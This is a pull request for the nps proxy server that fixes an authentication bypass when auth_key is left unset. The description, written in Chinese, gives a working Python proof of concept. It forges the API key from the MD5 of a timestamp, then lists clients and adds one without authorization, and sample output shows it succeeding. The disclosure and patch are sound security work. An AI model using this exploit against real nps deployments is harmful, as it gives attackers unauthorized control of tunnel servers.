### PR TITLE
fix: unauthorized access due to 'web api' enabled by defalut

### DIFF
--- a/web/controllers/base.go
+++ b/web/controllers/base.go
@@ -33,6 +33,9 @@ func (s *BaseController) Prepare() {
 	timestamp := s.GetIntNoErr("timestamp")
 	configKey := beego.AppConfig.String("auth_key")
 	timeNowUnix := time.Now().Unix()
+	if configKey == "" {
+		configKey = crypt.GetRandomString(128)
+	}
 	if !(md5Key != "" && (math.Abs(float64(timeNowUnix-int64(timestamp))) <= 20) && (crypt.Md5(configKey+strconv.Itoa(timestamp)) == md5Key)) {
 		if s.GetSession("auth") != true {
 			s.Redirect(beego.AppConfig.String("web_base_url")+"/login/index", 302)


### PR DESCRIPTION
据说nps有一个未授权访问漏洞0day，刚才试了一下发现漏洞是存在的。

在配置文件auth_key被注释的情况下，依然可以通过web api进行管理，poc如下：
```python
import time
import hashlib
import requests

md5 = hashlib.md5()
now = time.time()
md5.update(str(int(now)).encode())
key = md5.hexdigest()
print("get client list:")
post_data = {"auth_key": key, "timestamp": str(int(now)), "offset": 0, "limit": 10, "order": "asc"}
resp = requests.post("http://127.0.0.1:8080/client/list", post_data)
print(resp.text)
print()
post_data = {"auth_key": key, "timestamp": str(int(now)), "remark": "1", "u": "1", "p": "1", "vkey": "1",
             "config_conn_allow": "1", "compress": "0", "crypt": "0"}
print("add client:")
resp = requests.post("http://127.0.0.1:8080/client/add", post_data)
print(resp.text)
print()
print("get client list:")
post_data = {"auth_key": key, "timestamp": str(int(now)), "offset": 0, "limit": 10, "order": "asc"}
resp = requests.post("http://127.0.0.1:8080/client/list", post_data)
print(resp.text)

```

运行结果：
```
sh-3.2# python3 poc.py 
get client list:
{
  "bridgePort": 8024,
  "bridgeType": "tcp",
  "ip": "127.0.0.1",
  "rows": [],
  "total": 0
}

add client:
{
  "msg": "add success",
  "status": 1
}

get client list:
{
  "bridgePort": 8024,
  "bridgeType": "tcp",
  "ip": "127.0.0.1",
  "rows": [
    {
      "Cnf": {
        "U": "1",
        "P": "1",
        "Compress": false,
        "Crypt": false
      },
      "Id": 6,
      "VerifyKey": "1",
      "Addr": "",
      "Remark": "1",
      "Status": true,
      "IsConnect": false,
      "RateLimit": 0,
      "Flow": {
        "ExportFlow": 0,
        "InletFlow": 0,
        "FlowLimit": 0
      },
      "Rate": {
        "NowRate": 0
      },
      "NoStore": false,
      "NoDisplay": false,
      "MaxConn": 0,
      "NowConn": 0,
      "WebUserName": "",
      "WebPassword": "",
      "ConfigConnAllow": true,
      "MaxTunnelNum": 0,
      "Version": ""
    }
  ],
  "total": 1
}
sh-3.2# 
```

修复建议：可以在base.go的Prepare函数里加个判断，如果configKey是空，就生成随机字符串赋值。